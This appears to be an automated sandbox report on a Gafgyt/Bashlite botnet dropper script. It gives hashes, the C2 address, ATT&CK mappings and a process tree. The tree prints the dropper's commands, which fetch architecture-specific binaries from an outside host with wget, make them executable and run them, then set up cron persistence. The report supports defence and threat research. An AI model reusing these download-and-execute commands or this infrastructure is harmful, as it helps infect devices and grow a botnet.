gafgyt | 32e82081fe66e5f77000ecc3fde85384723a93ab7b242f39de6621d5959d38bf

Analysis

max time kernel
149s
max time network
129s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
26/02/2025, 16:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

skid.sh
Size

1KB
MD5

b748ad8311eb181303f9c59d1efd764f
SHA1

e3da904334e7ed388ef2ccca048c7a0e50e4332b
SHA256

32e82081fe66e5f77000ecc3fde85384723a93ab7b242f39de6621d5959d38bf
SHA512

b34853c0dac00b278c10e3019751634603099ce87125824a278e90d978560449ffc34c6af404134928be3d413979934d61aa5003fe1f826f980c2908449c7da5

Score

10^/10

gafgyt botnet defense_evasion discovery execution persistence privilege_escalation

Malware Config

Extracted

Family

gafgyt

185.224.0.18:1111

Signatures

Detected Gafgyt variant 2 IoCs

resource	yara_rule
behavioral1/files/fstream-1.dat	family_gafgyt
behavioral1/files/fstream-4.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 3 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1515	chmod
1520	chmod
1525	chmod

Executes dropped EXE 44 IoCs

ioc	pid	Process
/tmp/filefeAu3k	1527	skid.x86
/tmp/fileRQ6um4	1528	filefeAu3k
/tmp/filehX6Kfj	1529	fileRQ6um4
/tmp/filehPzCNv	1530	filehX6Kfj
/tmp/filewlPeoH	1531	filehPzCNv
/tmp/fileUNJmAP	1532	filewlPeoH
/tmp/filer0ZD37	1533	fileUNJmAP
/tmp/file2PqQrg	1534	filer0ZD37
/tmp/filedA4pBv	1535	file2PqQrg
/tmp/file7URz6H	1536	filedA4pBv
/tmp/file9vZTLT	1537	file7URz6H
/tmp/fileDdcTzY	1538	file9vZTLT
/tmp/fileKUrz65	1539	fileDdcTzY
/tmp/fileS2mxfm	1540	fileKUrz65
/tmp/filepNHWSx	1541	fileS2mxfm
/tmp/fileL0iCuJ	1542	filepNHWSx
/tmp/fileCSAtQ1	1543	fileL0iCuJ
/tmp/file06Aelf	1544	fileCSAtQ1
/tmp/file4AWRit	1545	file06Aelf
/tmp/fileeTKmSC	1546	file4AWRit
/tmp/file0mAoxU	1547	fileeTKmSC
/tmp/fileStoH96	1548	file0mAoxU
/tmp/file09XRBp	1549	fileStoH96
/tmp/filejrBlqE	1550	file09XRBp
/tmp/filezCIKeP	1553	filejrBlqE
/tmp/file4UqRQ5	1554	filezCIKeP
/tmp/file77OGtg	1555	file4UqRQ5
/tmp/fileZaIi9u	1556	file77OGtg
/tmp/fileMQWLXF	1557	fileZaIi9u
/tmp/fileAlPTZU	1558	fileMQWLXF
/tmp/fileQDoCW5	1559	fileAlPTZU
/tmp/fileF5K7pi	1560	fileQDoCW5
/tmp/fileEChKkx	1561	fileF5K7pi
/tmp/fileHwWYML	1562	fileEChKkx
/tmp/filed3F8zS	1563	fileHwWYML
/tmp/filePIdPK3	1564	filed3F8zS
/tmp/fileevXx8i	1565	filePIdPK3
/tmp/filevdYZGx	1566	fileevXx8i
/tmp/fileE8dqRM	1567	filevdYZGx
/tmp/filevgxNe6	1568	fileE8dqRM
/tmp/file5lQjcn	1569	filevgxNe6
/tmp/fileWgQntu	1570	file5lQjcn
/tmp/filevmdsSP	1571	fileWgQntu
/tmp/file8FRjc6	1572	filevmdsSP

Creates/modifies Cron job 1 TTPs 44 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalation

Cron

T1053.003

description	ioc	Process
File opened for modification	/etc/cron.hourly/0	file4UqRQ5
File opened for modification	/etc/cron.hourly/0	file77OGtg
File opened for modification	/etc/cron.hourly/0	fileEChKkx
File opened for modification	/etc/cron.hourly/0	filed3F8zS
File opened for modification	/etc/cron.hourly/0	fileKUrz65
File opened for modification	/etc/cron.hourly/0	filer0ZD37
File opened for modification	/etc/cron.hourly/0	fileMQWLXF
File opened for modification	/etc/cron.hourly/0	fileHwWYML
File opened for modification	/etc/cron.hourly/0	fileStoH96
File opened for modification	/etc/cron.hourly/0	filevgxNe6
File opened for modification	/etc/cron.hourly/0	fileCSAtQ1
File opened for modification	/etc/cron.hourly/0	fileeTKmSC
File opened for modification	/etc/cron.hourly/0	fileDdcTzY
File opened for modification	/etc/cron.hourly/0	skid.x86
File opened for modification	/etc/cron.hourly/0	fileRQ6um4
File opened for modification	/etc/cron.hourly/0	filehPzCNv
File opened for modification	/etc/cron.hourly/0	filewlPeoH
File opened for modification	/etc/cron.hourly/0	file4AWRit
File opened for modification	/etc/cron.hourly/0	file09XRBp
File opened for modification	/etc/cron.hourly/0	fileQDoCW5
File opened for modification	/etc/cron.hourly/0	fileF5K7pi
File opened for modification	/etc/cron.hourly/0	filePIdPK3
File opened for modification	/etc/cron.hourly/0	filevmdsSP
File opened for modification	/etc/cron.hourly/0	filefeAu3k
File opened for modification	/etc/cron.hourly/0	file7URz6H
File opened for modification	/etc/cron.hourly/0	file06Aelf
File opened for modification	/etc/cron.hourly/0	filezCIKeP
File opened for modification	/etc/cron.hourly/0	fileevXx8i
File opened for modification	/etc/cron.hourly/0	fileE8dqRM
File opened for modification	/etc/cron.hourly/0	fileWgQntu
File opened for modification	/etc/cron.hourly/0	fileUNJmAP
File opened for modification	/etc/cron.hourly/0	filedA4pBv
File opened for modification	/etc/cron.hourly/0	fileS2mxfm
File opened for modification	/etc/cron.hourly/0	filejrBlqE
File opened for modification	/etc/cron.hourly/0	fileZaIi9u
File opened for modification	/etc/cron.hourly/0	filevdYZGx
File opened for modification	/etc/cron.hourly/0	file0mAoxU
File opened for modification	/etc/cron.hourly/0	filehX6Kfj
File opened for modification	/etc/cron.hourly/0	file2PqQrg
File opened for modification	/etc/cron.hourly/0	file9vZTLT
File opened for modification	/etc/cron.hourly/0	filepNHWSx
File opened for modification	/etc/cron.hourly/0	fileL0iCuJ
File opened for modification	/etc/cron.hourly/0	fileAlPTZU
File opened for modification	/etc/cron.hourly/0	file5lQjcn

Reads system routing table 1 TTPs 1 IoCs

Gets active network interfaces from /proc virtual filesystem.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	file8FRjc6

Writes file to system bin folder 1 IoCs

description	ioc	Process
File opened for modification	/bin/ls	skid.x86

Reads system network configuration 1 TTPs 1 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	file8FRjc6

Reads runtime system information 44 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/self/exe	fileWgQntu
File opened for reading	/proc/self/exe	file2PqQrg
File opened for reading	/proc/self/exe	fileDdcTzY
File opened for reading	/proc/self/exe	fileL0iCuJ
File opened for reading	/proc/self/exe	file4AWRit
File opened for reading	/proc/self/exe	filejrBlqE
File opened for reading	/proc/self/exe	fileQDoCW5
File opened for reading	/proc/self/exe	fileHwWYML
File opened for reading	/proc/self/exe	fileRQ6um4
File opened for reading	/proc/self/exe	filedA4pBv
File opened for reading	/proc/self/exe	filepNHWSx
File opened for reading	/proc/self/exe	fileCSAtQ1
File opened for reading	/proc/self/exe	filePIdPK3
File opened for reading	/proc/self/exe	filevdYZGx
File opened for reading	/proc/self/exe	filehX6Kfj
File opened for reading	/proc/self/exe	filevmdsSP
File opened for reading	/proc/self/exe	filefeAu3k
File opened for reading	/proc/self/exe	file7URz6H
File opened for reading	/proc/self/exe	fileZaIi9u
File opened for reading	/proc/self/exe	fileF5K7pi
File opened for reading	/proc/self/exe	fileevXx8i
File opened for reading	/proc/self/exe	file9vZTLT
File opened for reading	/proc/self/exe	fileS2mxfm
File opened for reading	/proc/self/exe	file06Aelf
File opened for reading	/proc/self/exe	fileUNJmAP
File opened for reading	/proc/self/exe	fileKUrz65
File opened for reading	/proc/self/exe	fileeTKmSC
File opened for reading	/proc/self/exe	file0mAoxU
File opened for reading	/proc/self/exe	filezCIKeP
File opened for reading	/proc/self/exe	file4UqRQ5
File opened for reading	/proc/self/exe	filed3F8zS
File opened for reading	/proc/self/exe	fileE8dqRM
File opened for reading	/proc/self/exe	filewlPeoH
File opened for reading	/proc/self/exe	fileStoH96
File opened for reading	/proc/self/exe	file77OGtg
File opened for reading	/proc/self/exe	filevgxNe6
File opened for reading	/proc/self/exe	file5lQjcn
File opened for reading	/proc/self/exe	skid.x86
File opened for reading	/proc/self/exe	filehPzCNv
File opened for reading	/proc/self/exe	filer0ZD37
File opened for reading	/proc/self/exe	file09XRBp
File opened for reading	/proc/self/exe	fileMQWLXF
File opened for reading	/proc/self/exe	fileAlPTZU
File opened for reading	/proc/self/exe	fileEChKkx

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1518	rm
1511	wget
1516	skid.mips

Writes file to tmp directory 47 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/filed3F8zS	fileHwWYML
File opened for modification	/tmp/file09XRBp	fileStoH96
File opened for modification	/tmp/filehPzCNv	filehX6Kfj
File opened for modification	/tmp/fileL0iCuJ	filepNHWSx
File opened for modification	/tmp/file06Aelf	fileCSAtQ1
File opened for modification	/tmp/file4AWRit	file06Aelf
File opened for modification	/tmp/fileQDoCW5	fileAlPTZU
File opened for modification	/tmp/fileHwWYML	fileEChKkx
File opened for modification	/tmp/fileevXx8i	filePIdPK3
File opened for modification	/tmp/fileUNJmAP	filewlPeoH
File opened for modification	/tmp/fileDdcTzY	file9vZTLT
File opened for modification	/tmp/filezCIKeP	filejrBlqE
File opened for modification	/tmp/filevdYZGx	fileevXx8i
File opened for modification	/tmp/filevgxNe6	fileE8dqRM
File opened for modification	/tmp/file8FRjc6	filevmdsSP
File opened for modification	/tmp/file2PqQrg	filer0ZD37
File opened for modification	/tmp/filepNHWSx	fileS2mxfm
File opened for modification	/tmp/file0mAoxU	fileeTKmSC
File opened for modification	/tmp/fileEChKkx	fileF5K7pi
File opened for modification	/tmp/fileWgQntu	file5lQjcn
File opened for modification	/tmp/fileRQ6um4	filefeAu3k
File opened for modification	/tmp/file7URz6H	filedA4pBv
File opened for modification	/tmp/filejrBlqE	file09XRBp
File opened for modification	/tmp/fileMQWLXF	fileZaIi9u
File opened for modification	/tmp/filevmdsSP	fileWgQntu
File opened for modification	/tmp/skid.mips	wget
File opened for modification	/tmp/file9vZTLT	file7URz6H
File opened for modification	/tmp/fileS2mxfm	fileKUrz65
File opened for modification	/tmp/fileStoH96	file0mAoxU
File opened for modification	/tmp/fileE8dqRM	filevdYZGx
File opened for modification	/tmp/skid.mpsl	wget
File opened for modification	/tmp/fileCSAtQ1	fileL0iCuJ
File opened for modification	/tmp/file4UqRQ5	filezCIKeP
File opened for modification	/tmp/fileAlPTZU	fileMQWLXF
File opened for modification	/tmp/fileF5K7pi	fileQDoCW5
File opened for modification	/tmp/filefeAu3k	skid.x86
File opened for modification	/tmp/filehX6Kfj	fileRQ6um4
File opened for modification	/tmp/filewlPeoH	filehPzCNv
File opened for modification	/tmp/filedA4pBv	file2PqQrg
File opened for modification	/tmp/fileeTKmSC	file4AWRit
File opened for modification	/tmp/fileZaIi9u	file77OGtg
File opened for modification	/tmp/filePIdPK3	filed3F8zS
File opened for modification	/tmp/file5lQjcn	filevgxNe6
File opened for modification	/tmp/skid.x86	wget
File opened for modification	/tmp/filer0ZD37	fileUNJmAP
File opened for modification	/tmp/fileKUrz65	fileDdcTzY
File opened for modification	/tmp/file77OGtg	file4UqRQ5

/tmp/skid.sh
/tmp/skid.sh
1⤵
PID:1510
- /usr/bin/wget
  wget http://185.224.0.18/skid.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1511
- /bin/chmod
  chmod +x skid.mips
  2⤵
  - File and Directory Permissions Modification
  PID:1515
- /tmp/skid.mips
  ./skid.mips
  2⤵
  - System Network Configuration Discovery
  PID:1516
- /bin/rm
  rm -rf skid.mips
  2⤵
  - System Network Configuration Discovery
  PID:1518
- /usr/bin/wget
  wget http://185.224.0.18/skid.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1519
- /bin/chmod
  chmod +x skid.mpsl
  2⤵
  - File and Directory Permissions Modification
  PID:1520
- /tmp/skid.mpsl
  ./skid.mpsl
  2⤵
  PID:1521
- /bin/rm
  rm -rf skid.mpsl
  2⤵
  PID:1523
- /usr/bin/wget
  wget http://185.224.0.18/skid.x86
  2⤵
  - Writes file to tmp directory
  PID:1524
- /bin/chmod
  chmod +x skid.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1525
- /tmp/skid.x86
  ./skid.x86
  2⤵
  - Executes dropped EXE
  - Creates/modifies Cron job
  - Writes file to system bin folder
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1526
- - /tmp/filefeAu3k
    ./skid.x86
    3⤵
    - Executes dropped EXE
    - Creates/modifies Cron job
    - Reads runtime system information
    - Writes file to tmp directory
    PID:1527
  - - /tmp/fileRQ6um4
      ./skid.x86
      4⤵
      Executes dropped EXE
      Creates/modifies Cron job
      Reads runtime system information
      Writes file to tmp directory
      PID:1528
    - - /tmp/filehX6Kfj
        
        ./skid.x86
        5⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1529
      - /tmp/filehPzCNv
        
        ./skid.x86
        6⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1530
        
        /tmp/filewlPeoH
        
        ./skid.x86
        7⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1531
        
        /tmp/fileUNJmAP
        
        ./skid.x86
        8⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1532
        
        /tmp/filer0ZD37
        
        ./skid.x86
        9⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1533
        
        /tmp/file2PqQrg
        
        ./skid.x86
        10⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1534
        
        /tmp/filedA4pBv
        
        ./skid.x86
        11⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1535
        
        /tmp/file7URz6H
        
        ./skid.x86
        12⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1536
        
        /tmp/file9vZTLT
        
        ./skid.x86
        13⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1537
        
        /tmp/fileDdcTzY
        
        ./skid.x86
        14⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1538
        
        /tmp/fileKUrz65
        
        ./skid.x86
        15⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1539
        
        /tmp/fileS2mxfm
        
        ./skid.x86
        16⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1540
        
        /tmp/filepNHWSx
        
        ./skid.x86
        17⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1541
        
        /tmp/fileL0iCuJ
        
        ./skid.x86
        18⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1542
        
        /tmp/fileCSAtQ1
        
        ./skid.x86
        19⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1543
        
        /tmp/file06Aelf
        
        ./skid.x86
        20⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1544
        
        /tmp/file4AWRit
        
        ./skid.x86
        21⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1545
        
        /tmp/fileeTKmSC
        
        ./skid.x86
        22⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1546
        
        /tmp/file0mAoxU
        
        ./skid.x86
        23⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1547
        
        /tmp/fileStoH96
        
        ./skid.x86
        24⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1548
        
        /tmp/file09XRBp
        
        ./skid.x86
        25⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1549
        
        /tmp/filejrBlqE
        
        ./skid.x86
        26⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1550
        
        /tmp/filezCIKeP
        
        ./skid.x86
        27⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1553
        
        /tmp/file4UqRQ5
        
        ./skid.x86
        28⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1554
        
        /tmp/file77OGtg
        
        ./skid.x86
        29⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1555
        
        /tmp/fileZaIi9u
        
        ./skid.x86
        30⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1556
        
        /tmp/fileMQWLXF
        
        ./skid.x86
        31⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1557
        
        /tmp/fileAlPTZU
        
        ./skid.x86
        32⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1558
        
        /tmp/fileQDoCW5
        
        ./skid.x86
        33⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1559
        
        /tmp/fileF5K7pi
        
        ./skid.x86
        34⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1560
        
        /tmp/fileEChKkx
        
        ./skid.x86
        35⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1561
        
        /tmp/fileHwWYML
        
        ./skid.x86
        36⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1562
        
        /tmp/filed3F8zS
        
        ./skid.x86
        37⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1563
        
        /tmp/filePIdPK3
        
        ./skid.x86
        38⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1564
        
        /tmp/fileevXx8i
        
        ./skid.x86
        39⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1565
        
        /tmp/filevdYZGx
        
        ./skid.x86
        40⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1566
        
        /tmp/fileE8dqRM
        
        ./skid.x86
        41⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1567
        
        /tmp/filevgxNe6
        
        ./skid.x86
        42⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1568
        
        /tmp/file5lQjcn
        
        ./skid.x86
        43⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1569
        
        /tmp/fileWgQntu
        
        ./skid.x86
        44⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1570
        
        /tmp/filevmdsSP
        
        ./skid.x86
        45⤵
        Executes dropped EXE
        Creates/modifies Cron job
        Reads runtime system information
        Writes file to tmp directory
        
        PID:1571
        
        /tmp/file8FRjc6
        
        ./skid.x86
        46⤵
        Reads system routing table
        Reads system network configuration
        
        PID:1572

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/cron.hourly/0

Filesize
92B

MD5
3f006f7f81fc17be7f4a0d3da0fad5de

SHA1
97a94d3d0654c6551057af3809b52572bd7f9f5d

SHA256
982f9e0f089b91ba79df723435099df15c72e1201a45010ee60226ab136c93bf

SHA512
97d2ac0057427b940ada7c0fc805c1966e2535c3c3767ca85fef4a7e0fdc9d4ef9eb133530408b1e439df067881cb317e948ad9bfd487e958a04c97d9db978e0

Download Submit
/tmp/filefeAu3k

Filesize
90KB

MD5
4bc8168b8c378af3bfae2f24d97b9b6c

SHA1
fd44443b2cd003a2f730f1dc7a9d6fb0e5839eab

SHA256
6a55b599795d69cb14091be61447efef93b8b809904a2955f893c4424158b74e

SHA512
1c69ba6d6f12cf52bcfa0e2df1845a4ef29a5cb488e56869350ef78ad3b18cd7ac2a3dce6c7701c03d7a2aebb3f59a1977b8191fe655db847d831b160b6338bf

Download Submit
/tmp/filefeAu3k

Filesize
98KB

MD5
85f9548e1bd7afd130a1e2b851b41da8

SHA1
75c285684ec3964eb9bf3f4122e48c38f0ae11b8

SHA256
c8e23dad72cec959fc3a9fd530bf839ca04bb3f7e433364e5aabf62160ee4da9

SHA512
3f072cbf2ce940eecccb22eecfded787fd29f7a0828c6732c679a1769399ca7611d2ea201cbf37994efa40b0a2136aba50c8d760ed1e4f283a64f173ba23a576

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads